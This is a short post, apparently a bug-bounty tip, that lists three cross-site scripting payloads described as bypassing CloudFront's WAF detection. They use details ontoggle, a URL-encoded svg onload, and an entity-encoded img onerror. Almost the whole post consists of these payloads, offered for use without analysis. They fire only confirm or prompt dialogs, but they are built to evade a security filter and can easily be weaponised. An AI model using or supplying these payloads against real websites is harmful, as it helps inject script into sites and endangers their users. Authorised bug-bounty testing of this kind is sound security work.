✯ Cloudfront ▹ $XSS bypass detection, point shot.

$xssone ▸ “>’><details/open/ontoggle=confirm(‘XSS’)> ⌝
$xsstwo ▸ 6’%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/ ⌝
$xssthr ▸ &quot;&gt;&lt;img src=x onerror=confirm(1);&gt; ⌝

#BugBounty #BugBountyTip #WAF #infosec